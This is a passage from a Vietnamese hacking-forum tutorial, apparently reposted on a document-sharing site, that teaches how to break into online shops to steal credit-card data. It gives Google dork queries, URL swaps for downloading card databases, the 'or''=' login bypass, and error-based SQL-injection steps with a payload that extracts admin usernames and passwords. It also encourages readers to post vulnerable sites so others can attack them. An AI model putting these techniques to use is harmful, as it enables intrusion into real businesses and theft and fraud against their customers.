$sc_order_script_url = " />$sc_root_web_path = "/home/serve/resist/Html/Products";
$sc_path_for_cookie = "/store";
$path_to_html = "../Html";
1;
Được gì ? 1 số thông tin quan trọng về cơ sở dữ liệu
Tên và mật khẩu : Không cần
Sau đó
Xóa cái commerce_user_lib.pl đi thay bằng dòng chữ tìm ở $sc_order_log_name và ....
============================
III-Lỗi shopdisplaycategories
Cách thức tìm : Dùng Google
Câu tìm kiếm : shopdisplaycategories
Kết quả : Trong link các trang bị lỗi , bạn thay shopdisplaycategories.asp thành shopdbtest.asp
Được gì ? Bạn biết được đường dẫn để tải cơ sở dữ liệu Thẻ Tín Dụng

Tên và mật khẩu : Không cần
Sau đó : Thay shopdbtest.asp bằng phần trả lời của xdatabase ( bạn tìm ở phía trên )
============================
IV-Lỗi SQL Injection
Cách thức tìm : Dùng Google
Câu tìm kiếm : admentor
Kết quả : Bạn vào trang bị lỗi , đăng nhập với Username và Password là 'or''='
Được gì ? Bây giờ bạn nắm mọi họat động quản lý của website trong vai Admin
Tên và mật khẩu : 'or''='
Sau đó : Bạn tự tìm hiểu
============================
IV-Lỗi datasources
Cách thức tìm : Dùng Google
Câu tìm kiếm : datasources/ hay config/datasources/
Kết quả :Đường dẫn những trang bị lỗi này
Được gì ? Từ đây bạn thêm vào expire.mdb vào sau datasources/ hay config/datasources/
Tên và mật khẩu : Không cần
Sau đó : Bãn tải được kho dữ liệu có credit card
TUTORIAL BY CVHINT
-Lâu rồi không ghé qua diễn đàn chơi sợ anh em nhớNên tui xin góp một bài viết gọi là đóng góp cho diễn đàn tí xíu
với lại về việc hack tôi sẽ không tham gia một thời gian dài nên việc share hết kinh nghiệm háck shop cho anh em chỉ
còn là vấn đề thời gian vì vậy ai khoái cái dụ cc thì nên chú ý bài viết này của tôi nhé.
Bây giờ chúng ta sẽ đi vào vấn đề chính của bài viết này.Tôi biết hack shop thì ai cũng biết nhưng hack thế nào để có
cc thì rất nhiều người không biết hoặc nếu có thì chưa kịp ăn đã die vì lí do cách hack đó ai cũng biết ( Nếu tôi đoán
không lầm thì bài viết của Hiếupc ai cũng đọc qua rồi nhỉ ).Thế nên tôi sẽ chỉ cho các bạn một cách hack dạng sql mới
chưa phổ biến lắm và ít người hack được.
Nhưng xin mọi người cho tui nói vài lời.Tôi đã từng lướt qua các site của viethacker và vào trong box thảo luận về sql
xem thế nào thì có nhiều người cho ý kiến thế này "SQL là một lỗi đã bị lỗi thời".Trùi nghe mà buồi rười rượi.
Nói cho các bạn nghe SQL không hề lỗi thời chủ yếu là có biến cái lỗi thời thành lỗi phổ biến của riêng mình hay
không lại là chuyện khác.

Thôi nói nhiều mệt quá nên viết bài đây :
Vào google search từ khoá nào mà các bạn biết nhé.Tôi xin đóng góp một vài từ khoá bạn nào biết cái nào thì share
cho mọi người nhé.:
shopcategories.asp?id= /shop/ shopping product.asp?ProductID
allinurl:"shopdisplayproducts.asp?id=
allinurl:"shopdisplayproducts.asp?id=1
allinurl:"shopdisplayproducts.asp?id=2
allinurl:".com/shopdisplayproducts.asp?id=
allinurl:".net/shopdisplayproducts.asp?id=
.asp?=catalogid=
.asp?cid=
alliurl: shop$.asp?$=
shopexd.asp?
shopreviewlist.asp?id=1
shopreviewadd.asp?id=
rồi search đại một shop giả sử như thế này : www.cvhint.com/shopdisplayproducts.áp?id=1
Rồi khi thêm dấu ' vào nó không ra lỗi thì làm thế nào.Trùi không lẽ nó không có lỗi.
Thử là biết ngay thôi.Ta thay cái link khác thử xem sao.Trong vd này tôi thay cái shopdisplayproducts.asp?id=1 =
shoptellafriend.asp.asp?id=1
và thêm dấu ' lại xem sao.OOOOOOh lỗi kìa.Good.
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'catalogid = 12''.
/vshop/shoptellafriend.asp, line 183
Chài vì sao tôi gọi cái này là nâng cao các bạn nên để ý cái line của nó đó.Thường các bạn hack theo bài viết của
Hieupc thì chỉ hack được cái line có chỉ số cao thôi còn các line dưới 200 thường thì bó chiếu phải không nào.( Lúc
trước tôi gặp hoài à nên hiểu mà)
Tiếp tục dùng truy vấn mà hieupc chỉ cho các bạn đó rà số từ từ sẽ ra một chữ số đặc biệt ở đây thường là số 3 và đây
là kinh nghiệm chiến trường tui share cho anh em đây.:
line191 >>> 56
line184 >>> 47,43,53

line188 >>> 53,56, 60
line191 >>> 48
line185 >>> 86,43
line202 >>> 84,91
line208 >>> 48,57
line64 >>> 53
line211,187 >>> 43
line59 >>> 70
line58 >>> 43 --------------- Đây là các line thường gặp đó.Mai mốt chỉ cần gặp các line này thì các bạn chỉ cần rà số
đến những số ở trên là ra chữ số 3 để khai thác à.
Tiếp tục khi ra cái bảng có chứa chữ số 3 rồi chúng ta cần lấy user và pass thì nhập cái này vào :
fldusername%2b'/'%2bfldpassword
khi các bạn nhập truy vấn vào thì sẽ ra cái pass và user ở ngay số 3 mà thôi.
Còn link admin thường là shopadmin.asp nhưng cái cách này của tôi nếu lấy link là shopadmin.asp thì hầu như không
được.Tôi sẽ chỉ mọi người ở phần tiếp theo còn bây giờ đói rồi đi ăn cái đã.Mong anh em hiểu bài viết này của tôi và
thực hành thành công.Tôi viết không có cái gì gọi là dấu nghề như các bạn khác chỉ cần anh em đọc và hiểu thì sẽ có
shop ngon mà ăn dài dài thôi.Đây là một dạng nâng cao hơi nguy hiểm nên tui không thể đưa ra vd cho các bạn được
nếu ai có search thấy một site nào đó thì hãy post lên cho mọi người cùng hack.Bye
Bản quyền : cvhint và một người bạn.

Tài liệu liên quan

Tài liệu bạn tìm kiếm đã sẵn sàng tải về

Tải bản đầy đủ ngay
×